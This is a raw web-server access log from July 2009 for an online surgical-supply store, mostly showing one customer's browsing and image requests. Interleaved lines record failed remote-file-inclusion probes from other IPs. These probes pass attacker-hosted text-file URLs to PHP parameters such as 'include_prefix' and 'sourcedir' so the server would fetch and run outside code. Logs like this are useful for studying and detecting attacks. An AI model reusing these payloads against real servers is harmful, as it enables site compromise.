75.140.75.14 - - [16/Jul/2009:01:40:38 -0400] "GET /images/sd_left-space.gif HTTP/1.1" 200 50 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C774539D475004F71001+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SV1; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
75.140.75.14 - - [16/Jul/2009:01:40:42 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C774539D475004F71001+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SV1; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
75.140.75.14 - - [16/Jul/2009:01:40:42 -0400] "GET /CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+ORDCONF+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L118C72443EC4F500B101000+LSTWSEQ(S0060):1 HTTP/1.1" 200 520 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SV1; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
75.140.75.14 - - [16/Jul/2009:01:40:45 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C774539D475004F71001+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SV1; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
75.140.75.14 - - [16/Jul/2009:01:40:45 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C774539D475004F71001+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SV1; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
75.140.75.14 - - [16/Jul/2009:01:40:46 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C774539D475004F71001+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SV1; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
75.140.75.14 - - [16/Jul/2009:01:40:46 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C774539D475004F71001+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SV1; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
75.140.75.14 - - [16/Jul/2009:01:40:48 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C774539D475004F71001+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SV1; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
66.178.116.28 - - [16/Jul/2009:01:40:50 -0400] "GET /logs/access_log.Q109061300//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
75.140.75.14 - - [16/Jul/2009:01:40:51 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C774539D475004F71001+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SV1; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
75.140.75.14 - - [16/Jul/2009:01:40:53 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C774539D475004F71001+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SV1; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
218.246.20.221 - - [16/Jul/2009:01:40:53 -0400] "GET /logs/lostpasswd.php?env[include_prefix]=http://piffopuff.se/images/stories//test.txt??? HTTP/1.1" 404 217 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)"
218.246.20.221 - - [16/Jul/2009:01:40:53 -0400] "GET /lostpasswd.php?env[include_prefix]=http://piffopuff.se/images/stories//test.txt??? HTTP/1.1" 404 212 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)"
75.140.75.14 - - [16/Jul/2009:01:40:53 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C774539D475004F71001+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SV1; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
75.140.75.14 - - [16/Jul/2009:01:40:54 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C774539D475004F71001+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SV1; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
190.144.44.36 - - [16/Jul/2009:01:40:54 -0400] "GET /logs/access_log.Q109050900%20%20//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
190.144.44.36 - - [16/Jul/2009:01:40:54 -0400] "GET /logs/access_log.Q109050900%20%20//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
75.140.75.14 - - [16/Jul/2009:01:40:54 -0400] "GET /CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+ORDCONF+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L118C72443EC4F500B101000+LSTWSEQ(S0060):1 HTTP/1.1" 200 520 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SV1; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
75.140.75.14 - - [16/Jul/2009:01:41:01 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C774539D475004F71001+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SV1; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
75.140.75.14 - - [16/Jul/2009:01:41:03 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L118C784B358475004CE1001+M37+ENG HTTP/1.1" 200 40477 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SV1; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
75.140.75.14 - - [16/Jul/2009:01:41:08 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C774539D475004F71001+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SV1; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
190.144.44.36 - - [16/Jul/2009:01:41:13 -0400] "GET /logs/access_log.Q109050900%20%20//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
75.140.75.14 - - [16/Jul/2009:01:41:14 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C784B358475004CE1001+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SV1; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
75.140.75.14 - - [16/Jul/2009:01:41:15 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C784B358475004CE1001+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SV1; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
75.140.75.14 - - [16/Jul/2009:01:41:15 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C784B358475004CE1001+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SV1; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
75.140.75.14 - - [16/Jul/2009:01:41:16 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C784B358475004CE1001+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SV1; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
75.140.75.14 - - [16/Jul/2009:01:41:16 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C784B358475004CE1001+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SV1; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
75.140.75.14 - - [16/Jul/2009:01:41:16 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C784B358475004CE1001+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SV1; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
75.140.75.14 - - [16/Jul/2009:01:41:17 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C784B358475004CE1001+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SV1; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
75.140.75.14 - - [16/Jul/2009:01:41:17 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C784B358475004CE1001+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SV1; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
75.140.75.14 - - [16/Jul/2009:01:41:18 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C784B358475004CE1001+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SV1; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
75.140.75.14 - - [16/Jul/2009:01:41:18 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C784B358475004CE1001+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SV1; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
75.140.75.14 - - [16/Jul/2009:01:41:18 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C784B358475004CE1001+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SV1; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
75.140.75.14 - - [16/Jul/2009:01:41:18 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C784B358475004CE1001+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SV1; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
75.140.75.14 - - [16/Jul/2009:01:41:20 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C784B358475004CE1001+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SV1; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
75.140.75.14 - - [16/Jul/2009:01:41:20 -0400] "GET /images/blend.jpg HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C784B358475004CE1001+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SV1; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
75.140.75.14 - - [16/Jul/2009:01:41:20 -0400] "GET /images/pf-a.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C784B358475004CE1001+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SV1; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
75.140.75.14 - - [16/Jul/2009:01:41:21 -0400] "GET /images/space.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C784B358475004CE1001+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SV1; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
75.140.75.14 - - [16/Jul/2009:01:41:22 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C784B358475004CE1001+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SV1; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
75.140.75.14 - - [16/Jul/2009:01:41:22 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C784B358475004CE1001+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SV1; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
75.140.75.14 - - [16/Jul/2009:01:41:22 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C784B358475004CE1001+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SV1; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
75.140.75.14 - - [16/Jul/2009:01:41:22 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C784B358475004CE1001+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SV1; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
75.140.75.14 - - [16/Jul/2009:01:41:23 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C784B358475004CE1001+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SV1; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
75.140.75.14 - - [16/Jul/2009:01:41:23 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C784B358475004CE1001+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SV1; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
75.140.75.14 - - [16/Jul/2009:01:41:23 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C784B358475004CE1001+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SV1; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
75.140.75.14 - - [16/Jul/2009:01:41:23 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C784B358475004CE1001+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SV1; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
75.140.75.14 - - [16/Jul/2009:01:41:25 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C784B358475004CE1001+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SV1; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
75.140.75.14 - - [16/Jul/2009:01:41:25 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C784B358475004CE1001+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SV1; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
75.140.75.14 - - [16/Jul/2009:01:41:26 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C784B358475004CE1001+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SV1; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
190.144.44.36 - - [16/Jul/2009:01:41:29 -0400] "GET /logs/access_log.Q109050900%20%20//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
75.140.75.14 - - [16/Jul/2009:01:41:46 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L118C784931E475008D11001+M37+ENG HTTP/1.1" 200 39698 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C784B358475004CE1001+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SV1; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
75.140.75.14 - - [16/Jul/2009:01:41:53 -0400] "GET /images/pf-b.gif HTTP/1.1" 200 813 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C784931E475008D11001+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SV1; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
75.140.75.14 - - [16/Jul/2009:01:41:56 -0400] "GET /images/pf-a.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C784931E475008D11001+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SV1; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
75.140.75.14 - - [16/Jul/2009:01:41:56 -0400] "GET /CGI-BIN/LANSAWEB?PROCFUN+ORINQP+ORDRDT+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L118C72443EC4F500B101000+WSEQ(S0020):2+OKEY(A0190):001372917000O0099755+WEBKEY(A0100):PRTORD HTTP/1.1" 200 30112 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SV1; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
75.140.75.14 - - [16/Jul/2009:01:42:05 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C784931E475008D11001+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SV1; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
75.140.75.14 - - [16/Jul/2009:01:42:14 -0400] "GET /images/printheader.jpg HTTP/1.1" 200 11345 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+ORINQP+ORDRDT+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L118C72443EC4F500B101000+WSEQ(S0020):2+OKEY(A0190):001372917000O0099755+WEBKEY(A0100):PRTORD" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SV1; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
75.140.75.14 - - [16/Jul/2009:01:42:17 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+ORINQP+ORDRDT+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L118C72443EC4F500B101000+WSEQ(S0020):2+OKEY(A0190):001372917000O0099755+WEBKEY(A0100):PRTORD" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SV1; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
75.140.75.14 - - [16/Jul/2009:01:42:17 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+ORINQP+ORDRDT+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L118C72443EC4F500B101000+WSEQ(S0020):2+OKEY(A0190):001372917000O0099755+WEBKEY(A0100):PRTORD" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SV1; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
75.140.75.14 - - [16/Jul/2009:01:42:17 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+ORINQP+ORDRDT+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L118C72443EC4F500B101000+WSEQ(S0020):2+OKEY(A0190):001372917000O0099755+WEBKEY(A0100):PRTORD" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SV1; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
75.140.75.14 - - [16/Jul/2009:01:42:20 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+ORINQP+ORDRDT+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L118C72443EC4F500B101000+WSEQ(S0020):2+OKEY(A0190):001372917000O0099755+WEBKEY(A0100):PRTORD" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SV1; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
75.140.75.14 - - [16/Jul/2009:01:42:20 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+ORINQP+ORDRDT+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L118C72443EC4F500B101000+WSEQ(S0020):2+OKEY(A0190):001372917000O0099755+WEBKEY(A0100):PRTORD" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SV1; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
75.140.75.14 - - [16/Jul/2009:01:42:20 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+ORINQP+ORDRDT+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L118C72443EC4F500B101000+WSEQ(S0020):2+OKEY(A0190):001372917000O0099755+WEBKEY(A0100):PRTORD" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SV1; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
75.140.75.14 - - [16/Jul/2009:01:42:21 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+ORINQP+ORDRDT+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L118C72443EC4F500B101000+WSEQ(S0020):2+OKEY(A0190):001372917000O0099755+WEBKEY(A0100):PRTORD" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SV1; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
75.140.75.14 - - [16/Jul/2009:01:42:21 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+ORINQP+ORDRDT+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L118C72443EC4F500B101000+WSEQ(S0020):2+OKEY(A0190):001372917000O0099755+WEBKEY(A0100):PRTORD" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SV1; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
